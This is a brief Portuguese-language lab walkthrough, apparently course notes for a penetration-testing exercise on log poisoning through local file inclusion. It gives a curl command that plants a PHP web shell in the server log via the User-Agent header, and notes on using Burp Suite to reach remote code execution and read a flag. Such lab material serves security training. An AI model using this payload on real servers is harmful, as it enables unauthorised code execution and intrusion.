LinkedinTryHackme

Log Poisoning - 1

  1. Use qualquer uma das técnicas abordadas nesta seção para obter RCE e, em seguida, envie a saída do seguinte comando: pwd

  • Envenenar o log enviando uma solicitação via curl

curl -s "http://<SERVER_IP>:<PORT>/index.php" -A "<?php system($_GET['cmd']); ?>"

  • Capturar as requisições com o burpsuite

  1. Tente usar uma técnica diferente para ganhar RCE e leia a bandeira em /

PreviousLFI & Uploads - 1NextAutomation and Prevention

Last updated